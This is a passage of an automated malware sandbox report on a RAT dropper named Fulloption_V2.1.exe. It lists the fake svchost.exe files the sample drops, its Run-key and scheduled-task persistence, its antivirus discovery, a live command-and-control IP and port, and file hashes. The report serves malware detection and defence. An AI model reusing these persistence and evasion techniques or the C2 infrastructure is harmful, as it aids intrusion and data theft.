                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\ProgramData\svchost.exeQueries volume information: C:\ProgramData\svchost.exe VolumeInformation
                        Source: C:\ProgramData\svchost.exeQueries volume information: C:\ProgramData\svchost.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeCode function: 2_2_00007FF6AE82DDD4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,2_2_00007FF6AE82DDD4
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: svchost.exe, 00000003.00000002.3403575699.000000001D200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3406373230.000000001D29A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3406589599.000000001D2AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 3.0.svchost.exe.e70000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Fulloption_V2.1.exe.3276bd8.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Fulloption_V2.1.exe.3289218.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.svchost.exe.336f760.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.svchost.exe.336f760.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000003.00000000.2150604993.0000000000E72000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2151998153.0000000003251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.3395976559.00000000032EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.3395976559.000000000336E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.3395976559.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Fulloption_V2.1.exe PID: 2012, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4000, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\svchost.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: 3.0.svchost.exe.e70000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Fulloption_V2.1.exe.3276bd8.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Fulloption_V2.1.exe.3289218.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.svchost.exe.336f760.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.svchost.exe.336f760.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000003.00000000.2150604993.0000000000E72000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2151998153.0000000003251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.3395976559.00000000032EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.3395976559.000000000336E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.3395976559.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Fulloption_V2.1.exe PID: 2012, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4000, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\svchost.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                        Windows Management Instrumentation
                        1
                        DLL Side-Loading
                        1
                        DLL Side-Loading
                        11
                        Disable or Modify Tools
                        OS Credential Dumping1
                        System Time Discovery
                        Remote Services12
                        Archive Collected Data
                        1
                        Ingress Tool Transfer
                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Scheduled Task/Job
                        1
                        Scheduled Task/Job
                        111
                        Process Injection
                        11
                        Deobfuscate/Decode Files or Information
                        LSASS Memory1
                        File and Directory Discovery
                        Remote Desktop ProtocolData from Removable Media1
                        Encrypted Channel
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts1
                        PowerShell
                        21
                        Registry Run Keys / Startup Folder
                        1
                        Scheduled Task/Job
                        2
                        Obfuscated Files or Information
                        Security Account Manager24
                        System Information Discovery
                        SMB/Windows Admin SharesData from Network Shared Drive1
                        Non-Standard Port
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                        Registry Run Keys / Startup Folder
                        2
                        Software Packing
                        NTDS571
                        Security Software Discovery
                        Distributed Component Object ModelInput Capture2
                        Non-Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        DLL Side-Loading
                        LSA Secrets151
                        Virtualization/Sandbox Evasion
                        SSHKeylogging12
                        Application Layer Protocol
                        Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                        Masquerading
                        Cached Domain Credentials2
                        Process Discovery
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items151
                        Virtualization/Sandbox Evasion
                        DCSync1
                        Application Window Discovery
                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                        Process Injection
                        Proc Filesystem1
                        System Network Configuration Discovery
                        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1559237 Sample: Fulloption_V2.1.exe Startdate: 20/11/2024 Architecture: WINDOWS Score: 100 55 ip-api.com 2->55 57 Suricata IDS alerts for network traffic 2->57 59 Found malware configuration 2->59 61 Malicious sample detected (through community Yara rule) 2->61 63 18 other signatures 2->63 9 Fulloption_V2.1.exe 4 2->9         started        13 svchost.exe 2->13         started        15 svchost.exe 2->15         started        signatures3 process4 file5 45 C:\Users\user\AppData\Roaming\svchost.exe, PE32 9->45 dropped 47 C:\Users\user\...\FullOption_2.1Xenos.exe, PE32+ 9->47 dropped 49 C:\Users\user\...\Fulloption_V2.1.exe.log, CSV 9->49 dropped 79 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 9->79 81 Drops PE files with benign system names 9->81 17 svchost.exe 1 6 9->17         started        22 FullOption_2.1Xenos.exe 9->22         started        83 Antivirus detection for dropped file 13->83 85 Multi AV Scanner detection for dropped file 13->85 87 Machine Learning detection for dropped file 13->87 signatures6 process7 dnsIp8 51 45.141.27.248, 49986, 7777 SPECTRAIPSpectraIPBVNL Netherlands 17->51 53 ip-api.com 208.95.112.1, 49711, 80 TUT-ASUS United States 17->53 43 C:\ProgramData\svchost.exe, PE32 17->43 dropped 65 Antivirus detection for dropped file 17->65 67 System process connects to network (likely due to code injection or exploit) 17->67 69 Multi AV Scanner detection for dropped file 17->69 75 7 other signatures 17->75 24 powershell.exe 23 17->24         started        27 powershell.exe 23 17->27         started        29 powershell.exe 23 17->29         started        31 2 other processes 17->31 71 Machine Learning detection for dropped file 22->71 73 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 22->73 file9 signatures10 process11 signatures12 77 Loading BitLocker PowerShell Module 24->77 33 conhost.exe 24->33         started        35 conhost.exe 27->35         started        37 conhost.exe 29->37         started        39 conhost.exe 31->39         started        41 conhost.exe 31->41         started        process13

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        Fulloption_V2.1.exe63%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                        Fulloption_V2.1.exe100%AviraTR/Dropper.Gen
                        Fulloption_V2.1.exe100%Joe Sandbox ML
                        SourceDetectionScannerLabelLink
                        C:\ProgramData\svchost.exe100%AviraTR/Spy.Gen
                        C:\Users\user\AppData\Roaming\svchost.exe100%AviraTR/Spy.Gen
                        C:\ProgramData\svchost.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Roaming\svchost.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe100%Joe Sandbox ML
                        C:\ProgramData\svchost.exe84%ReversingLabsByteCode-MSIL.Ransomware.CryptConsole
                        C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe68%ReversingLabsWin32.Trojan.Generic
                        C:\Users\user\AppData\Roaming\svchost.exe84%ReversingLabsByteCode-MSIL.Ransomware.CryptConsole
                        No Antivirus matches
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        45.141.27.2480%Avira URL Cloudsafe
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        ip-api.com
                        208.95.112.1
                        truefalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          45.141.27.248true
                          • Avira URL Cloud: safe
                          unknown
                          http://ip-api.com/line/?fields=hostingfalse
                            high
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://scripts.sil.org/OFLThisFullOption_2.1Xenos.exe.0.drfalse
                              high
                              http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.2249638917.0000022B1006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2347596021.000001F839F6D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2504001471.00000172F4F4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2693458155.000001649006C000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.apache.org/licenses/LICENSE-2.0FullOption_2.1Xenos.exe.0.drfalse
                                  high
                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000F.00000002.2565717676.0000016480228000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000004.00000002.2229972474.0000022B00229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2286205990.000001F82A129000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2401801389.00000172E5109000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2565717676.0000016480228000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000F.00000002.2565717676.0000016480228000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.micom/pkiops/Docs/ry.htm0powershell.exe, 00000004.00000002.2258983299.0000022B6E970000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2361653227.000001F842573000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://www.microsoft.copowershell.exe, 0000000F.00000002.2735931313.00000164F0B2D000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://contoso.com/Licensepowershell.exe, 0000000F.00000002.2693458155.000001649006C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://crl.micpowershell.exe, 0000000C.00000002.2525536547.00000172FD688000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://contoso.com/Iconpowershell.exe, 0000000F.00000002.2693458155.000001649006C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://scripts.sil.org/OFLhttps://indiantypefoundry.comNinadFullOption_2.1Xenos.exe.0.drfalse
                                                    high
                                                    https://github.com/Pester/Pesterpowershell.exe, 0000000F.00000002.2565717676.0000016480228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://curl.haxx.se/docs/http-cookies.htmlFullOption_2.1Xenos.exe, 00000002.00000000.2149053166.00007FF6AE833000.00000002.00000001.01000000.00000006.sdmp, FullOption_2.1Xenos.exe, 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmp, FullOption_2.1Xenos.exe.0.drfalse
                                                        high
                                                        http://crl.mpowershell.exe, 00000007.00000002.2363039514.000001F842646000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000004.00000002.2229972474.0000022B00229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2286205990.000001F82A129000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2401801389.00000172E5109000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2565717676.0000016480228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://contoso.com/powershell.exe, 0000000F.00000002.2693458155.000001649006C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.2249638917.0000022B1006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2347596021.000001F839F6D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2504001471.00000172F4F4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2693458155.000001649006C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://ip-api.comsvchost.exe, 00000003.00000002.3395976559.000000000334D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3395976559.0000000003362000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://go.microsoft.cpowershell.exe, 0000000F.00000002.2715651701.00000164EE6AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://go.microsoft.ctainpowershell.exe, 0000000F.00000002.2715651701.00000164EE6AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://aka.ms/pscore68powershell.exe, 00000004.00000002.2229972474.0000022B00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2286205990.000001F829F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2401801389.00000172E4EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2565717676.0000016480001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namesvchost.exe, 00000003.00000002.3395976559.000000000334D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3395976559.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2229972474.0000022B00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2286205990.000001F829F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2401801389.00000172E4EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2565717676.0000016480001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://github.com/itfoundry/Poppins)&&&&sFullOption_2.1Xenos.exe.0.drfalse
                                                                            high
                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs
                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            208.95.112.1
                                                                            ip-api.comUnited States
                                                                            53334TUT-ASUSfalse
                                                                            45.141.27.248
                                                                            unknownNetherlands
                                                                            62068SPECTRAIPSpectraIPBVNLtrue
                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                            Analysis ID:1559237
                                                                            Start date and time:2024-11-20 10:36:13 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 7m 43s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Number of analysed new started processes analysed:21
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:0
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:Fulloption_V2.1.exe
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.evad.winEXE@22/24@1/2
                                                                            EGA Information:
                                                                            • Successful, ratio: 12.5%
                                                                            HCA Information:
                                                                            • Successful, ratio: 100%
                                                                            • Number of executed functions: 78
                                                                            • Number of non-executed functions: 141
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe
                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                                            • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                            • Execution Graph export aborted for target FullOption_2.1Xenos.exe, PID 416 because there are no executed function
                                                                            • Execution Graph export aborted for target Fulloption_V2.1.exe, PID 2012 because it is empty
                                                                            • Execution Graph export aborted for target powershell.exe, PID 1060 because it is empty
                                                                            • Execution Graph export aborted for target powershell.exe, PID 4816 because it is empty
                                                                            • Execution Graph export aborted for target powershell.exe, PID 4824 because it is empty
                                                                            • Execution Graph export aborted for target svchost.exe, PID 5648 because it is empty
                                                                            • Execution Graph export aborted for target svchost.exe, PID 5712 because it is empty
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                            • VT rate limit hit for: Fulloption_V2.1.exe
                                                                            TimeTypeDescription
                                                                            04:37:12API Interceptor54x Sleep call for process: powershell.exe modified
                                                                            04:38:12API Interceptor189x Sleep call for process: svchost.exe modified
                                                                            10:38:08Task SchedulerRun new task: svchost path: C:\ProgramData\svchost.exe
                                                                            10:38:08AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\ProgramData\svchost.exe
                                                                            10:38:29AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\ProgramData\svchost.exe
                                                                            10:38:49AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            208.95.112.1BoostFPS.exeGet hashmaliciousXWormBrowse
                                                                            • ip-api.com/line/?fields=hosting
                                                                            New_Order_Inquiry.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • ip-api.com/line/?fields=hosting
                                                                            seethebestthingswithgreatsituationshandletotheprogress.htaGet hashmaliciousCobalt Strike, AgentTesla, HTMLPhisherBrowse
                                                                            • ip-api.com/line/?fields=hosting
                                                                            DHL_Doc.9787653446578978656879764534576879764545766456.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • ip-api.com/line/?fields=hosting
                                                                            Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsxGet hashmaliciousAgentTesla, HTMLPhisherBrowse
                                                                            • ip-api.com/line/?fields=hosting
                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                            • ip-api.com/line/
                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                            • ip-api.com/line/
                                                                            FACTER9098767800.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • ip-api.com/line/?fields=hosting
                                                                            [Purchase Order] PO2411024.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • ip-api.com/line/?fields=hosting
                                                                            Wire slip account payable.pif.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • ip-api.com/line/?fields=hosting
                                                                            45.141.27.248BoostFPS.exeGet hashmaliciousXWormBrowse
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              ip-api.comBoostFPS.exeGet hashmaliciousXWormBrowse
                                                                              • 208.95.112.1
                                                                              New_Order_Inquiry.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 208.95.112.1
                                                                              seethebestthingswithgreatsituationshandletotheprogress.htaGet hashmaliciousCobalt Strike, AgentTesla, HTMLPhisherBrowse
                                                                              • 208.95.112.1
                                                                              DHL_Doc.9787653446578978656879764534576879764545766456.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 208.95.112.1
                                                                              Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsxGet hashmaliciousAgentTesla, HTMLPhisherBrowse
                                                                              • 208.95.112.1
                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                              • 208.95.112.1
                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                              • 208.95.112.1
                                                                              paket teklif.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 208.95.112.1
                                                                              FACTER9098767800.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 208.95.112.1
                                                                              [Purchase Order] PO2411024.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                              • 208.95.112.1
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              SPECTRAIPSpectraIPBVNLBoostFPS.exeGet hashmaliciousXWormBrowse
                                                                              • 45.141.27.248
                                                                              bPRQRIfbbq.exeGet hashmaliciousUnknownBrowse
                                                                              • 45.138.16.44
                                                                              4Fm0sK0yKz.exeGet hashmaliciousAsyncRATBrowse
                                                                              • 45.141.215.18
                                                                              Payload 94.75 (3).225.exeGet hashmaliciousUnknownBrowse
                                                                              • 45.141.215.40
                                                                              Payload 94.75 (2).225.exeGet hashmaliciousUnknownBrowse
                                                                              • 45.141.215.116
                                                                              Payload 94.75 (3).225.exeGet hashmaliciousUnknownBrowse
                                                                              • 45.138.16.76
                                                                              Payload 94.75 (2).225.exeGet hashmaliciousUnknownBrowse
                                                                              • 45.141.215.21
                                                                              Payload 94.75.225.exeGet hashmaliciousUnknownBrowse
                                                                              • 45.141.215.61
                                                                              https://alcatrazpackages.com/elchapo.htmlGet hashmaliciousUnknownBrowse
                                                                              • 45.87.42.74
                                                                              la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                              • 45.141.201.6
                                                                              TUT-ASUSBoostFPS.exeGet hashmaliciousXWormBrowse
                                                                              • 208.95.112.1
                                                                              New_Order_Inquiry.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 208.95.112.1
                                                                              seethebestthingswithgreatsituationshandletotheprogress.htaGet hashmaliciousCobalt Strike, AgentTesla, HTMLPhisherBrowse
                                                                              • 208.95.112.1
                                                                              DHL_Doc.9787653446578978656879764534576879764545766456.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 208.95.112.1
                                                                              Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsxGet hashmaliciousAgentTesla, HTMLPhisherBrowse
                                                                              • 208.95.112.1
                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                              • 208.95.112.1
                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                              • 208.95.112.1
                                                                              http://ok.clicknowvip.comGet hashmaliciousUnknownBrowse
                                                                              • 162.252.214.5
                                                                              paket teklif.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 208.95.112.1
                                                                              FACTER9098767800.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 208.95.112.1
                                                                              No context
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe4QnTBz8fN3.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):75264
                                                                                Entropy (8bit):5.976607627301734
                                                                                Encrypted:false
                                                                                SSDEEP:1536:jSJd0NZZ4CuyMAa70b36MJP6ROuEn9i8:+J3C1ba70b3xYOuEn48
                                                                                MD5:12B722899C9A6B517D52B8DE2C7C3E2E
                                                                                SHA1:A92DBC8EDD02ADEEAB5FA9C0E2A884A84A315FE5
                                                                                SHA-256:57EC7BCA087DD678BEF5AEAAA52F4F393D63613976701E6A111015FB7F9F1B6C
